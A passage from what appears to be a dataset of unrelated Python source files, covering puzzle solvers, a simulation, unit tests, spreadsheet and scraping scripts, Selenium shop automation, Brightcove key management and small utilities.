print 'Found %d combinations of coins that add up to %dp' % (num_combos, goal)
return num_combos
# ============================================================================
def main():
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# denoms = [200, 100, 50, 20, 10, 5, 2, 1]
denoms = [5, 2, 1]
for i in xrange(1, 5):
findNumCombos(i, denoms)
print '========================================'
denoms = [200, 100, 50, 20, 10, 5, 2, 1]
findNumCombos(200, denoms)
print '========================================'
# ============================================================================
if __name__ == "__main__":
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
sys.exit( main() )
# ============================================================================
# ============
# = solution =
# ============
#
|
11,023 | 31eb8160613163c7bfc609fd83495377b5e3121a | import random
from Names import Name as Name
import time
import bunny
class GridBunny:
def __init__(self, sex, name, color,coords, parents = []):
self.sex = sex
self.name = name
self.color = color
self.age = 0
self.parents = parents
self.coords = coords
#print (parents)
try:
self.id = (parents[1].id + parents[0].id + 1)
except:
self.id = 0
def Grid():
grid = {}
for x in range(0,80):
for y in range(0,80):
grid[(x,y)] = GridBunny("U","","",(x,y),[])
return grid
def emptycells(self,grid):
emptycells_list = []
for i in [-1,0,1]:
for j in [-1,0,1]:
try:
if (self.coords[0]+i,self.coords[1]+j) in grid and grid[(self.coords[0]+i,self.coords[1]+j)].sex == "U": emptycells_list.append((self.coords[0]+i,self.coords[1]+j))
except Exception as e: print(str(e))
return emptycells_list
def assign(self,other,grid):
grid[self.coords].sex = other.sex
grid[self.coords].name = other.name
grid[self.coords].color = other.color
grid[self.coords].age = other.age
grid[self.coords].parents = other.parents
if other.parents!=[] : grid[self.coords].id = (other.parents[1].id + other.parents[0].id + 1)
else: grid[self.coords].id = 0
return grid
def GridMove(self,grid):
assign = GridBunny.assign
emptycells = GridBunny.emptycells
emptycell_list = grid[self.coords].emptycells(grid)
cell = (-1,-1)
if emptycell_list != [] :
try:
cell = random.choice(emptycell_list)
grid = grid[cell].assign(self,grid)
grid = grid[self.coords].move_kill(grid)
except Exception as e: print(str(e))
return (grid,cell)
def occupied_cells(grid):
emptycells_list = []
for bunnie in grid:
if grid[bunnie].sex != "U": emptycells_list.append(grid[bunnie].coords)
return emptycells_list
def Rad(self,grid):
random.seed()
if random.randint(0,100) in range(0,2):
self.sex = "X"
grid[random.choice(GridBunny.occupied_cells(grid))].sex = "X"
return grid
def bunny_pop(grid,bunnie):
for i in range(0,len(grid)-1):
try:
grid = grid[bunnie.coords].assign(GridBunny("U","","",obj.coords,[]),grid)
except Exception as e: pass
return grid
def Recreation(mal,female,grid):
random.seed(time.clock())
random.seed(random.randint(0,1000))
f,F,m,M,X="f","F","m","M","X"
male = grid[mal]
fem = grid[female]
#print("female is "+str(fem)+"and male is "+str(male))
color = fem.color
if fem :
#print("female exists")
emptycells = GridBunny.emptycells
cells_2b = fem.emptycells(grid)
if cells_2b != []:
#print("cells exist")
cell = random.choice(cells_2b)
random.seed(random.randint(0,1000))
sex = random.choice(["m","f"])
if cell:
#print("single cell acquired")
child = GridBunny(sex,Name.name(sex),color,cell,[fem,male])
#print("child born: "+str(child))
grid = child.Rad(grid)
grid = grid[cell].assign(child,grid)
return grid
def kill(self,grid):
return GridBunny.bunny_pop(grid,self)
def move_kill(self,grid):
return GridBunny.bunny_pop(grid,self)
def tick(self,grid):
try:
i+=1
except Exception as e:
i=random.randint(0,100)
random.seed(i)
kill = GridBunny.kill
if self.sex != "U" :
#grid[self.coords].age += 1
self.age+=1
moved = self.GridMove(grid)
if not moved[1] == (-1,-1):
grid = moved[0]
self.coords = moved[1]
len_g = len(GridBunny.occupied_cells(grid))
try:
if len_g > 1000 :
for i in range(0,int(len_g/2)):
GridBunny.bunny_pop(grid,random.choice(GridBunny.occupied_cells(grid)))
except Exception as e: print(str(e))
if self.sex != "X" and self.sex != "U":
if self.age >= 2 :
self.sex = self.sex.upper()
#grid[self.coords].sex = grid[self.coords].sex.upper()
if grid[self.coords].age > 10 : self = GridBunny("U","","",self.coords,[])
elif self.sex == "X":
if self.age > 50:
self = GridBunny("U","","",self.coords,[])
grid = grid[self.coords].assign(self,grid)
return grid
|
11,024 | c4fdc5acbc5b0765d4d3013a177a3140d5c2231d | from django.test import TestCase
from ..models import (
HomeBanner,
homebanner_image_upload_to,
homebanner_video_upload_to,)
class HomeBannerTestCase(TestCase):
def test_image_upload_to(self):
banner = HomeBanner.objects.create()
self.assertEqual(
homebanner_image_upload_to(banner, 'whatever.png'),
'homebanners/{:%Y-%m-%d}/image.jpeg'.format(banner.created))
def test_video_upload_to(self):
banner = HomeBanner.objects.create()
self.assertEqual(
homebanner_video_upload_to(banner, 'whatever.webm'),
'homebanners/{:%Y-%m-%d}/video.webm'.format(banner.created))
|
11,025 | 1fa09118f800de3d56fffb177beb91ef1ba71461 | import xlrd
import xlwt
wb = xlrd.open_workbook("C:\\Users\\ABRIDGE0\\Desktop\\DAY2\\titanic3.xls") #Open Workbook
print(wb.nsheets) #print no of Sheets
print(wb.sheet_names()) # Print sheet names
ws = wb.sheet_by_name('titanic3') # open sheet
print(ws.nrows) #print no of columns
print(ws.ncols) #print no of columns
wb=xlwt.Workbook();
syf=wb.add_sheet("SYF");
syf.write(0,0,"Passenger Name")
for x in range(10):
print(ws.cell(x,2).value)
syf.write(x+1,0,ws.cell(x,2).value)
wb.save("PassengerNames.xls")
|
11,026 | 5b0ebd583c11cb4f7cec630be7bbcd9e296daa15 | from .utils import *
class Project(object):
# json_path = "E:/AbaqusDir/auto/output"
# abaqus_dir = "E:/AbaqusDir/sym-40/abaqus-files"
abaqus_exe_path = "C:/SIMULIA/Abaqus/6.14-2/code/bin/abq6142.exe"
script_path = "E:/AbaqusDir/auto/abaqus_api"
pre_script_name = "pre.py"
post_script_name = "post.py"
def __init__(self, project_name, json_path, abaqus_dir, iter_times=10, step_factor=0.25, enable_rand=False):
self.project_name = project_name
self.json_path = json_path
self.abaqus_dir = abaqus_dir
self.enable_rand = enable_rand
self.abaqus_env = RunAbaqus(
abaqus_exe_path=self.abaqus_exe_path,
abaqus_dir=abaqus_dir,
script_path=self.script_path,
pre_script=self.pre_script_name,
post_script=self.post_script_name
)
self.iter_times = iter_times
self.step_factor = step_factor
def run(self, pt_list):
for time in range(self.iter_times):
print("time:%d" % time, "pt_list=\n", pt_list)
plain = InitPlain(pt_list)
# plain.plot_xy()
plain.save_fig("%s-%d" % (self.project_name, time), self.json_path)
res_file_prefix = "res_"
tmp_1st_name = "%s-1st-%d.json" % (self.project_name, time)
tmp_2nd_name = "%s-2nd-%d.json" % (self.project_name, time)
d_1st = plain.to_json(file_name=tmp_1st_name, save_path=self.json_path)
abq_name = "%s-%d" % (self.project_name, time)
d_2nd = GenerateAbaqusData.to_json(
d_in=d_1st,
json_file_name=tmp_2nd_name,
res_file_prefix=res_file_prefix,
json_save_dir=self.json_path,
abaqus_dir=self.abaqus_dir,
mdb_name=abq_name,
odb_name=abq_name,
iter_time=time,
left_hang=10,
left_hang_height=5,
right_hang=30,
right_hang_height=5,
radius=0.02,
thickness=0.003,
elastic_modular=26E+09,
density=1850,
deformation_step_name="Step-1",
)
self.abaqus_env.pre_process(self.json_path, tmp_2nd_name)
self.abaqus_env.post_process(self.json_path, tmp_2nd_name)
res_file_name = res_file_prefix + abq_name + ".json"
with open(self.json_path + "/" + res_file_name, "r") as f:
d = json.load(f)
print("bound_stderr=", d['bound_stderr'])
# factor = self.step_factor * random() + 0.05
factor = self.step_factor
iter = Iteration(d, factor=factor, enable_rand=self.enable_rand)
pt_list = iter.get_new_points()
if __name__ == '__main__':
pass
|
11,027 | aa486b8eee026319ba25c3b3af9afb51f74119ea | from seed import *
from log import logger
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
class User:
def __init__(self, driver, title=None,
fname=None, lname=None, email=None,
password=None, dob=None, company=None, address=None,
city=None, postalcode=None, phone=None):
logger.info('Starting user profile')
self.automation = driver
self.title = title
self.fname = fname
self.lname = lname
self.email = email
self.password = password
self.dob = dob
self.company = company
self.address = address
self.city = city
self.postalcode = postalcode
self.phone = phone
logger.info('Ending user profile')
def set_user_info(self, usrs):
"""
set user profile info using random user of users list
:return:
"""
logger.info('Starting set user profile info')
user = choice(usrs)
self.title = user['title']
self.fname = user['fname']
self.lname = user['lname']
self.email = user['email']
self.password = user['password']
self.dob = user['dob']
self.company = user['company']
self.address = user['address']
self.city = user['city']
self.postalcode = user['postalcode']
self.phone = user['phone']
logger.info('Ending set user profile info')
def __repr__(self):
return f'fname: {self.fname} \nlastname: {self.lname}\n' \
f'email: {self.email}\npassword: {self.password}\n' \
f'dob: {self.dob}\ncompany: {self.company}\naddress: {self.address}\ncity: {self.city}' \
f'postalcode: {self.postalcode}\nphone: {self.phone}'
def create_account(self):
"""
create new user account using user profile info
:return: True if login else False
"""
logger.info('*' * 20 + ' Starting creating user account ' + '*' * 20)
logger.info(f'\nfor user {self}')
self.automation.wait.until(EC.presence_of_element_located((By.ID, 'email_create')))
self.automation.driver.find_element_by_css_selector("#email_create").send_keys(self.email) # send email
self.automation.driver.find_element_by_css_selector("#SubmitCreate").click() # 'create an account' btn
# ##############################################
# 1- mr. or mrs. ?
logger.info(f'Choose title {self.title}')
self.automation.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#account-creation_form div.account_creation div.clearfix')))
if self.title == 'mr.':
gender_selector = "input#id_gender1"
else:
gender_selector = "input#id_gender2"
self.automation.driver.find_element_by_css_selector(gender_selector).click()
self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 2000)") # scroll down
# ##############################################
logger.info(f'adding fname {self.fname}')
# 2- first name
self.automation.driver.find_element_by_css_selector("#customer_firstname").send_keys(self.fname)
# ##############################################
logger.info(f'adding lname {self.lname}')
# 3- last name
self.automation.driver.find_element_by_css_selector("#customer_lastname").send_keys(self.lname)
# ##############################################
logger.info(f'adding email {self.email}')
# 4- email
email_elem = self.automation.driver.find_element_by_css_selector("#email")
email = email_elem.get_attribute('value')
if not email: # check email is passed or not ?
logger.info('email was not added , add it again ')
email.send_keys(self.email)
# ##############################################
logger.info(f'adding password')
# 5- password
password = f'document.getElementById("passwd").value="{self.password}";' # js code to change password elm value
self.automation.driver.execute_script(password)
self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 1000)") # scroll down
# ##############################################
# 6- date of birth year-month-day
logger.info(f'adding dob {self.dob}')
self.select_dob()
# ##############################################
logger.info(f'adding fname#2 {self.fname}')
# 7- fname
get_fname = 'return document.querySelectorAll("div.account_creation #firstname")[0].value;'
fname = self.automation.driver.execute_script(get_fname)
if not fname: # check fname is passed or not ?
fname = f'document.querySelectorAll("div.account_creation #firstname")[0].value="{self.fname}";'
self.automation.driver.execute_script(fname)
# ##############################################
logger.info(f'adding lname#2 {self.lname}')
# 8- last name
get_lname = 'return document.querySelectorAll("div.account_creation #lastname")[0].value;'
lname = self.automation.driver.execute_script(get_lname)
if not lname: # check lname is passed or not ?
lname = f'document.querySelectorAll("div.account_creation #lastname")[0].value="{self.lname}";'
self.automation.driver.execute_script(lname)
# ##############################################
# 9- complete profile ( company, city, address, mobile, postalcode, alias address)
logger.info('complete profile with ( company, city, address, mobile, postalcode, alias address)')
logger.info(f'company({self.company}) , city({self.city}) , address({self.address}), mobile({self.phone}) , postalcode({self.postalcode}) , alias address({self.address[0] + self.address[-1]})')
self.complete_profile()
# ##############################################
# 10- state (randomly choice)
logger.info('choose state randomly')
states = [state.text for state in self.automation.driver.find_elements_by_css_selector('#id_state option')]
Select(self.automation.driver.find_element_by_css_selector('#id_state')).select_by_visible_text(choice(states))
# ###############################################
self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 700)") # scroll down
self.automation.driver.find_element_by_css_selector('#submitAccount').click() # register btn
# ################ wait to login ###############################
account_lst = self.automation.driver.find_elements_by_css_selector('.myaccount-link-list')
timer = 1
is_login = True
while not account_lst:
if timer == 60:
is_login = False
break
time.sleep(.3)
account_lst = self.automation.driver.find_elements_by_css_selector('.myaccount-link-list')
timer += 1
return is_login
def complete_profile(self):
elements = [
{'element': 'company', 'elem_id': 'company', 'elem_value': self.company},
{'element': 'address', 'elem_id': 'address1', 'elem_value': self.address},
{'element': 'city', 'elem_id': 'city', 'elem_value': self.city},
{'element': 'postalcode', 'elem_id': 'postcode', 'elem_value': self.postalcode},
{'element': 'mobile', 'elem_id': 'phone_mobile', 'elem_value': self.phone},
{'element': 'alias address', 'elem_id': 'alias', 'elem_value': self.address[0] + self.address[-1]},
]
for element in elements:
elem_id = element['elem_id']
value = element['elem_value']
elm_value = f'document.getElementById("{elem_id}").value="{value}";'
self.automation.driver.execute_script(elm_value)
def select_dob(self):
dob = self.dob.split('-')
year = dob[0]
month = dob[1]
day = dob[-1]
if day[0] == '0': # example : remove 0 ==> 03 to 3
day = day[1:]
if month[0] == '0': # example : remove 0 ==> 05 to 5
month = month[1:]
dob_elems = {
'days': day,
'months': month,
'years': year,
}
for elm_id, value in dob_elems.items():
select = Select(self.automation.driver.find_element_by_id(elm_id))
# select by visible value
select.select_by_value(value)
def choose_blouses_item(self):
"""
choose blouses item and idd to cart
Select “Blouses” Subcategory in “Women” Category & checkout procedure
:return:
"""
self.automation.driver.get('http://automationpractice.com/index.php?id_category=7&controller=category')
logger.info(f'You Moved to "{self.automation.driver.title}"')
self.automation.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.product-image-container a.product_img_link')))
logger.info('Click on Product')
# click on product
self.automation.driver.execute_script("document.querySelectorAll('div.product-image-container "
"a.product_img_link')[0].click()")
# time.sleep(2)
logger.info('Adding Product to cart')
# add to cart
self.automation.driver.execute_script("document.querySelectorAll('#add_to_cart button')[0].click()")
time.sleep(2)
# proceed to checkout
logger.info('proceed to checkout')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '.button-container .btn.btn-default.button.button-medium')))
self.automation.driver.execute_script("document.querySelectorAll('.button-container "
".btn.btn-default.button.button-medium')[0].click()")
def proceed_to_checkout_and_payment(self):
"""
proceed to checkout and confirm order
wizard : 1-summary ==> 2-sign in ==> 3-address ==> 4-shipping ==> 5-Payment
:return:
"""
# 1- summary
logger.info('starting wizard with summary')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '.cart_navigation a.standard-checkout')))
self.automation.driver.execute_script("document.querySelectorAll('.cart_navigation a.standard-checkout')[0]"
".click()")
# 2-sign in & 3-address
logger.info('2-sign in & 3-address')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, 'button[name="processAddress"]')))
self.automation.driver.find_element_by_css_selector('button[name="processAddress"]').click()
# 4- shipping
logger.info('4- shipping')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#uniform-cgv span')))
is_checked = self.automation.driver.find_element_by_css_selector('#uniform-cgv span').get_attribute('class')
if not is_checked: # agree
self.automation.driver.execute_script("document.querySelectorAll('#cgv')[0].click()")
self.automation.driver.find_element_by_css_selector('button[name=processCarrier]').click()
logger.info('agree and confirmed')
# pay by bank wire
logger.info('pay by bank wire')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '.payment_module a')))
self.automation.driver.find_element_by_css_selector('.payment_module a').click()
# 5- payment and confirm
logger.info('5- payment and confirm')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#cart_navigation button')))
self.automation.driver.find_element_by_css_selector('#cart_navigation button').click()
# back to orders
logger.info('back to orders')
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, 'p.cart_navigation .button-exclusive.btn')))
self.automation.driver.find_element_by_css_selector('p.cart_navigation .button-exclusive.btn').click()
# how many items do you have
time.sleep(1.5)
self.automation.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#order-list tbody tr')))
items = self.automation.driver.find_elements_by_css_selector('#order-list tbody tr')
logger.info(f'You have "{len(items)}" at your order')
|
11,028 | a648fe22a1390ae0dfab40eb270201660d2cd3be | # You are given an unordered array consisting of consecutive integers [1, 2, 3, ..., n] without any duplicates. You are allowed to swap any two elements. You need to find the minimum number of swaps required to sort the array in ascending order.
# For example, given the array we perform the following steps:
# i arr swap (indices)
# 0 [7, 1, 3, 2, 4, 5, 6] swap (0,3)
# 1 [2, 1, 3, 7, 4, 5, 6] swap (0,1)
# 2 [1, 2, 3, 7, 4, 5, 6] swap (3,4)
# 3 [1, 2, 3, 4, 7, 5, 6] swap (4,5)
# 4 [1, 2, 3, 4, 5, 7, 6] swap (5,6)
# 5 [1, 2, 3, 4, 5, 6, 7]
# It took swaps to sort the array.
# Function Description
# Complete the function minimumSwaps in the editor below. It must return an integer representing the minimum number of swaps to sort the array.
# minimumSwaps has the following parameter(s):
# arr: an unordered array of integers
# Input Format
# The first line contains an integer, , the size of .
# The second line contains space-separated integers .
# Constraints
# Output Format
# Return the minimum number of swaps to sort the given array.
# Sample Input 0
# 4
# 4 3 1 2
# Sample Output 0
# 3
def minimumSwaps(arr):
count = 0
for i in range(0, len(arr)):
while arr[i] != (i+1):
temp = arr[i]-1
arr[i], arr[temp] = arr[temp], arr[i]
count +=1
return count |
11,029 | c23bfd7bc6d05085652d9f3ca7fe83fc964666b2 | # -*- encoding: utf-8 -*-
#!/usr/bin/env python
#########################################################################
# File Name: ScrapeGrubHubByCity.py
# Author: Bryant Shih
# mail: hs2762@columbia.edu
# Created Time: Mon Oct 18 12:15:01 2015
#########################################################################
import sys
from writeExcel import excelWriteObj
from scrapePages import webObj
from chromeDriver import openChromePage
try:
import cPickle as pickle
except:
import pickle
if(__name__ == '__main__'):
city = sys.argv[1] #string as parameter ex. 'HARTFORD'
#load city-zip code dictionary
with open('City2ZipCode.pkl', 'rb') as fg:
city2zipCodes = pickle.load(fg)
#get zip codes list stored in pickle file alrady.
if(not city.upper() in city2zipCodes):
print city + 'is not in our options, please use another city as input'
#list the #od zip codes for each city
#for city in city2zipCodes.keys():
#print '# of zip codes in ' + city + ' is ' + str(len(city2zipCodes[city]))
print 'Creating an excel file with name "' + city + '_restaurant_data.xls" for storing data scraped...'
xlObj = excelWriteObj(city)
print 'Data scraping on grubhub.com for ' + city +' is about to start...'
for zipCode in city2zipCodes[city.upper()]:
print '--Scraping data for zip code ' + zipCode + ' ...'
chromeDriverObj = openChromePage(zipCode)
url = chromeDriverObj.getUrl()
url = url.replace('&facet=open_now:true', '') #delete the condition to get all restaurant data no matter it open or not now.
#print 'url: ' + url
#get url for delivery category
delUrl = url.replace('pickup', 'delivery')
delUrl = delUrl.replace('PICKUP', 'DELIVERY')
delUrl = delUrl.replace('&facet=open_now:true', '')
delResultPage = webObj(delUrl)
delResultPage.switchAndScrapePages()
xlObj.writeData(delResultPage.getData())
#transfer url to pickup category
pickUpUrl = url.replace('delivery', 'pickup')
pickUpUrl = pickUpUrl.replace('DELIVERY', 'PICKUP')
#add '&radius=1' to url
pickUpResultPage = webObj(pickUpUrl)
pickUpResultPage.switchAndScrapePages()
xlObj.writeData(pickUpResultPage.getData())
print '--Scraping data for zip code ' + zipCode + ' is done'
print 'Data scraping on grubhub.com for ' + city +' is finieshed!!'
|
11,030 | 67d254f80885c599471b621aaf741da01851dd8b | import rimg as RIMG
import apil as APIL
import simg as SIMG
from random import randint
class random:
def anime(source=False, min="1", max=False, check=True):
out = RIMG.random.anime(source=source,min=min,max=max,check=check)
return out
def neko(source=False, min="1", max=False, check=True):
out = RIMG.random.anime(source=source,min=min,max=max,check=check)
return out
class pat:
def static():
return RIMG.random.pat.static()
def animated():
return RIMG.random.pat.animated()
class hug:
def static():
return RIMG.random.hug.static()
def animated():
return RIMG.random.hug.animated()
class search:
def anime(num, source=False):
out = SIMG.search.anime(num=num,source=source)
return out
def neko(num, source=False):
out = SIMG.search.neko(num,source=source)
return out
# Note: Using this API you are going to be using a API that MAY (unlikely) But MAY send NSFW results.
# If that happens, DM my owner (LazyNeko#5644), or join the Neko Support Server from the website.
# #-------------------------------------------------#
# To join: Copy the below link.
# https://discord.gg/RauzUYK
# #--------------------------------------------------#
# You may edit this code to your needs. I dont mind ;3
# TODO: make requests smaller (DONE)
# TODO: make "hug"&"pat" animated&static endpoint! (DONE)
# TODO: make all endpoints seperate files (DONE, WIP1)
#print(search.neko(randint(1,10),True)) #DEBUG 2 (SEARCH WITH SOURCE)
#print(random.anime()) #CHECK FOR SOURCE-ONLY!
def version():
return str(open("version.txt", "r").read())
|
11,031 | 6f99bbcd45da72644709b74413b50b52367f2a47 | from Scenes import Scene
from pygame.locals import *
class PlaySceneMulti(Scene):
def __init__(self, gameController):
super(PlaySceneMulti, self).__init__(gameController)
|
11,032 | 71b61f7ac25b76e91c93f2967f9ca6935c5da8d3 | """
Tests for nltk.pos_tag
"""
import unittest
from nltk import pos_tag, word_tokenize
class TestPosTag(unittest.TestCase):
def test_pos_tag_eng(self):
text = "John's big idea isn't all that bad."
expected_tagged = [
("John", "NNP"),
("'s", "POS"),
("big", "JJ"),
("idea", "NN"),
("is", "VBZ"),
("n't", "RB"),
("all", "PDT"),
("that", "DT"),
("bad", "JJ"),
(".", "."),
]
assert pos_tag(word_tokenize(text)) == expected_tagged
def test_pos_tag_eng_universal(self):
text = "John's big idea isn't all that bad."
expected_tagged = [
("John", "NOUN"),
("'s", "PRT"),
("big", "ADJ"),
("idea", "NOUN"),
("is", "VERB"),
("n't", "ADV"),
("all", "DET"),
("that", "DET"),
("bad", "ADJ"),
(".", "."),
]
assert pos_tag(word_tokenize(text), tagset="universal") == expected_tagged
def test_pos_tag_rus(self):
text = "Илья оторопел и дважды перечитал бумажку."
expected_tagged = [
("Илья", "S"),
("оторопел", "V"),
("и", "CONJ"),
("дважды", "ADV"),
("перечитал", "V"),
("бумажку", "S"),
(".", "NONLEX"),
]
assert pos_tag(word_tokenize(text), lang="rus") == expected_tagged
def test_pos_tag_rus_universal(self):
text = "Илья оторопел и дважды перечитал бумажку."
expected_tagged = [
("Илья", "NOUN"),
("оторопел", "VERB"),
("и", "CONJ"),
("дважды", "ADV"),
("перечитал", "VERB"),
("бумажку", "NOUN"),
(".", "."),
]
assert (
pos_tag(word_tokenize(text), tagset="universal", lang="rus")
== expected_tagged
)
def test_pos_tag_unknown_lang(self):
text = "모르겠 습니 다"
self.assertRaises(NotImplementedError, pos_tag, word_tokenize(text), lang="kor")
# Test for default kwarg, `lang=None`
self.assertRaises(NotImplementedError, pos_tag, word_tokenize(text), lang=None)
def test_unspecified_lang(self):
# Tries to force the lang='eng' option.
text = "모르겠 습니 다"
expected_but_wrong = [("모르겠", "JJ"), ("습니", "NNP"), ("다", "NN")]
assert pos_tag(word_tokenize(text)) == expected_but_wrong
|
11,033 | 8744ca1e8e368c0fa4fa6a7abb09693d74b3cad1 | try:
print(7 / 0)
except ZeroDivisionError:
print('Поймано исключение - деление на ноль')
except:
print('Поймано какое-то исключение')
finally:
print('Блок Finally')
try:
if True:
raise TypeError
except TypeError:
print('Поймано наше исключение')
print('Программа завершена', 2, 'Qwerty')
|
11,034 | 1f396e4837dd6621e828143b6ce4588fb680a8e2 | """
Created on Fri May 26 12:00:17 2017
@author: Ian
"""
f = open('/reg/g/psdm/data/ExpNameDb/experiment-db.dat', 'r')
a = f.read()
f.close()
cTemplate = open("cTemplate.txt","r")
newCFile = cTemplate.read()
cTemplate.close()
g = open('template.py')
apple = g.read()
g.close()
f = open("/reg/g/psdm/data/ExpNameDb/experiment-db.dat", "r")
dataLines = f.readlines()
newlineRemoved = []
for line in dataLines:
new = line.replace('\n','')
new = new.replace('\r','')
newlineRemoved.append(new)
art = line.rstrip(' ') + ' '
a = a.replace(line,art)
f.close()
cFormattedData = ""
for line in newlineRemoved:
cFormattedData = cFormattedData + line + "\\n"
dataLength = str(len(cFormattedData))
newCFile = newCFile.replace('DATASIZE',dataLength)
newCFile = newCFile.replace('STRING',cFormattedData)
cFile = open("updatedCFile.c","w")
cFile.write(newCFile)
cFile.close()
pear = apple.replace('STRING', a)
h = open('ExpNameData.py', 'w')
h.write(pear)
h.close()
|
11,035 | 5777667687154c854005ba97efbe85b569968555 | #!/usr/bin/env python3
import sys
import argparse
from pprint import pprint
from brightcove.OAuth import OAuth
from brightcove.Key import Key
from brightcove.utils import load_account_info
# disable certificate warnings
import urllib3
urllib3.disable_warnings()
# init the argument parsing
parser = argparse.ArgumentParser(prog=sys.argv[0])
parser.add_argument('--list', action='store_true', default=False, help='List all keys in account')
parser.add_argument('--add', metavar='<key data>', type=str, help='Add a key to account')
parser.add_argument('--delete', metavar='<key ID|all>', type=str, help='Delete a key by ID or all')
parser.add_argument('--config', metavar='<config filename>', type=str, help='Name and path of account config information file')
parser.add_argument('--account', metavar='<Brightcove Account ID>', type=str, help='Brightcove Account ID to use (if different from ID in config)')
# parse the args
args = parser.parse_args()
# get account info from config file
try:
account_id, client_id, client_secret, _ = load_account_info(args.config)
except Exception as e:
print(e)
sys.exit(2)
# if account ID was provided override the one from config
account_id = args.account or account_id
# create a JWT API instance
jwt = Key( OAuth(account_id=account_id,client_id=client_id, client_secret=client_secret) )
# delete one or all keys
if args.delete:
if args.delete=='all':
keyList = jwt.ListPublicKeys().json()
for sub in keyList:
print(jwt.DeletePublicKey(key_id=sub['id']).text)
else:
print(jwt.DeletePublicKey(key_id=args.delete).text)
# add a key
if args.add:
private_key = ''
try:
with open(args.add, 'r') as file:
lines = file.readlines()
for line in lines:
if not '-----' in line:
private_key += line.strip()
except:
print(f'Error trying to access private keyfile "{args.keyfile}".')
sys.exit(2)
print(jwt.RegisterPublicKey(key_data=private_key).text)
# show all keys
if args.list:
pprint(jwt.ListPublicKeys().json())
|
11,036 | 57c11f70814f576f80f66ee23afaab734daca156 | # /*************** <auto-copyright.pl BEGIN do not edit this line> *************
# *
# * VE-Suite is (C) Copyright 1998-2007 by Iowa State University
# *
# * Original Development Team:
# * - ISU's Thermal Systems Virtual Engineering Group,
# * Headed by Kenneth Mark Bryden, Ph.D., www.vrac.iastate.edu/~kmbryden
# * - Reaction Engineering International, www.reaction-eng.com
# *
# * This library is free software; you can redistribute it and/or
# * modify it under the terms of the GNU Library General Public
# * License as published by the Free Software Foundation; either
# * version 2 of the License, or (at your option) any later version.
# *
# * This library is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# * Library General Public License for more details.
# *
# * You should have received a copy of the GNU Library General Public
# * License along with this library; if not, write to the
# * Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# * Boston, MA 02111-1307, USA.
# *
# * -----------------------------------------------------------------
# * Date modified: $Date$
# * Version: $Rev$
# * Author: $Author$
# * Id: $Id$
# * -----------------------------------------------------------------
# *
# *************** <auto-copyright.pl END do not edit this line> **************
"""Data structure for VE-Launcher's Dependencies."""
import wx
from velBase import *
class DepsArray:
""""""
def __init__(self, defArray = None):
if defArray != None:
self.array = defArray
else:
self.array = self.ReadEntries()
def __len__(self):
"""Returns the length of the array."""
return len(self.array)
def Add(self, entry):
self.array.append(entry)
def Delete(self, entry):
self.array.remove(entry)
def GetNames(self):
return self.array
def ReadEntries(self):
"""Reads the list of dependencies from the config's Deps folder."""
entries = []
config = wx.Config.Get()
config.SetPath(DEPS_CONFIG)
step = config.GetFirstEntry()
while (step[0]):
entries.append(config.Read(step[1]))
step = config.GetNextEntry(step[2])
config.SetPath('..')
return entries
def WriteConfig(self):
"""Writes the entire list to config."""
config = wx.Config.Get()
config.DeleteGroup(DEPS_CONFIG)
config.SetPath(DEPS_CONFIG)
pos = 0
for entry in self.array:
config.Write("Dependency%s" % pos, entry)
pos += 1
config.SetPath('..')
|
11,037 | c62b90303aae692b6588b9ccb2a4c4ee740656b4 | from django.forms import ModelForm
from .models import AircraftType
class AircraftTypeForm(ModelForm):
class Meta:
model = AircraftType
fields = ['name']
help_texts = {'name': 'Название типа воздушного судна'}
|
11,038 | 931df4c1b357bb8e44bd54db1ada90b2e2583b29 |
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from django.conf import settings
def generate_password_key(password):
# password = b"password"
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=get_bytes(settings.SALT),
iterations=100000, )
key = base64.urlsafe_b64encode(kdf.derive(get_bytes(password)))
return key
def get_bytes(v):
if isinstance(v, str):
return bytes(v.encode("utf-8"))
if isinstance(v, bytes):
return v
raise TypeError(
"SALT & PASSWORD must be specified as strings that convert nicely to "
"bytes."
) |
11,039 | e960b8c8e5b32cf090e1fb02f0ea1f1732c35e25 | ne1=input("Numarul curent elev: ")
ne2=input("Numarul curent elev: ")
ne3=input("Numarul curent elev: ")
np1=input("punctajul elevului ")
np2=input("punctajul elevului ")
np3=input("punctajul elevului ")
|
11,040 | 47d3243f2d180357bcdaf0cfb5f0bd9e508178b9 | #!/bin/python3
#
# kyosk.py
#
# Author: Mauricio Matamoros
# Date: 2023.02.14
# License: MIT
#
# Plays a video file using VLC with the Raspberry Pi
#
import vlc
import time
player = vlc.MediaPlayer()
video = vlc.Media('/home/pi/videos/video.mp4')
player.set_media(video)
player.play()
while player.is_playing:
time.sleep(0)
|
11,041 | ed53740811486556584b0f17f52ff59c089dc227 | import pickle
from serializar_objetos import Vehiculo
ficheroApertura=open("losCoches","rb")
#Cargamos los datos
misCoches=pickle.load(ficheroApertura)
ficheroApertura.close()
for c in misCoches:
print(c.estado()) |
11,042 | 135a17c32209281628ca1c8fa1d66f2bcdabc018 | from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask import Flask
#将app分离出来,以便在蓝图中使用
app = Flask(__name__)
db = SQLAlchemy()
mail = Mail()
|
